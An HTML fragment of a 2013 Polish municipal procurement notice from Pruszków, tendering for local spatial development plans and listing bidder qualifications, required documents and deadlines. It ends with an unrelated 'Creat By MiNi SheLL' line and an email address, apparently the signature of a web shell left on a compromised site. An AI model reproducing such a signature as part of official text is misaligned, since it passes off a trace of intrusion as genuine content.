prowadzenia działalności jest krótszy  - w tym okresie, oraz załączy dowody dotyczące najważniejszych 
usług określające, że usługi zostały wykonane należycie w tym: 
   - nie mniej niż 2 uchwalone i obowiązujące miejscowe plany zagospodarowania przestrzennego
     sporządzone - od podjęcia uchwały o przystąpieniu do jego sporządzenia - do podjęcia uchwały 
     o jego uchwaleniu - według procedur i problematyki określonych w ustawie z dnia 27 marca 2003 r.
     o planowaniu i zagospodarowaniu przestrzennym (Dz. U z 2012r., poz. 647 z późn. zm.) każdy obejmujący obszar o powierzchni nie mniejszej niż 50 ha w granicach miasta co najmniej 50-tys.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia będzie uznany za spełniony jeżeli Wykonawca wykaże się:
- dysponowaniem oprogramowaniami umożliwiającymi wykonanie tekstów i opracowań graficznych w formach wymaganych przez  Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie uznany za spełniony jeżeli Wykonawca wykaże się dysponowaniem osobami zdolnymi do wykonania zamówienia w tym minimum:
- 1 osobą posiadającą kwalifikacje do pełnienia funkcji głównego projektanta planu. 
    Główny projektant planu musi posiadać aktualne zaświadczenie o członkostwie w Okręgowej Izbie 
    Urbanistów oraz posiadać doświadczenie zawodowe wyrażające się w wykonaniu -samodzielnie lub 
    w zespole w okresie ostatnich 3 lat - co najmniej 2 uchwalonych i  obowiązujących miejscowych planów 
    zagospodarowania przestrzennego sporządzonego - od podjęcia uchwały o przystąpieniu do jego
    sporządzenia - do podjęcia uchwały o jego uchwaleniu - według procedur i problematyki określonych 
    w  ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2012r.,
    poz. 647 z późn. zm.) - każdy obejmujący obszar o powierzchni nie mniejszej niż  50 ha  
    w granicach miasta co najmniej 50-tys.
- minimum czteroosobowym zespołem projektowym (z wyłączeniem głównego projektanta) 
    w tym specjaliści  w dziedzinie: komunikacji, ochrony środowiska i infrastruktury technicznej, którzy
    będą wykonywać zamówienie. Każda z tych osób musi posiadać wykształcenie i kwalifikacje zawodowe 
   do wykonywania tego typu prac oraz doświadczenie w wykonaniu co najmniej jednego opracowania obejmującego obszar o powierzchni nie mniejszej niż 50 ha. w granicach miasta co najmniej 50-tys.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań z zakresu tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożone oświadczenie o spełnianiu warunku udziału w postępowaniu określonego w art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- nie mniej niż 2 uchwalone i obowiązujące miejscowe plany zagospodarowania przestrzennego
     sporządzone - od podjęcia uchwały o przystąpieniu do jego sporządzenia - do podjęcia uchwały 
     o jego uchwaleniu - według procedur i problematyki określonych w ustawie z dnia 27 marca 2003 r.
     o planowaniu i zagospodarowaniu przestrzennym (Dz. U z 2012r., poz. 647 z późn. zm.) każdy obejmujący obszar o powierzchni nie mniejszej niż 50 ha w granicach miasta co najmniej 50-tys.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pozostałych dokumentów składających się na ofertę
1) Formularz ofertowy (według załączonego druku) 
2) Upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawcy 
    UWAGA: dołączone wtedy o ile nie wynika z załączonych dokumentów 
3) Wykaz prac, które Wykonawca zamierza powierzyć podwykonawcom 
4) Oświadczenie o dysponowaniu oprogramowaniem umożliwiającym wykonanie tekstów i opracowań graficznych w formach wymaganych przez Zamawiającego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy niezależnie 
w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach tj.:

a) wynagrodzenie może ulec zmianie  w przypadku;
- gdy podczas realizacji zamówienia konieczne stanie się wprowadzenie zmian w opracowywanych
  projektach planów zagospodarowania przestrzennego, nie wynikających z winy Wykonawcy,
  a wynikających ze zmian stanu prawnego lub faktycznego, które mają wpływ na treść zawartej 
  umowy, których nie można było wcześniej przewidzieć i jeżeli ta zmiana leży w interesie publicznym - 
  do 30% całkowitej ceny brutto podanej w ofercie,

b) termin może ulec zmianie w przypadku:
  - przedłużenia się uzgodnień zewnętrznych przez podmioty do tego upoważnione,
  - wystąpienia  okoliczności nie zawinionych przez strony, których nie można było wcześniej przewidzieć,
  - udokumentowanej niemożności uzyskania  wymaganych przepisami uzgodnień  i opinii.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> cena wersji papierowej 35,00 PLN
Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
Biuro Zamówień Publicznych
pok. 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 12:00, miejsce: Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
Biuro Zamówień Publicznych
pok. 113.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com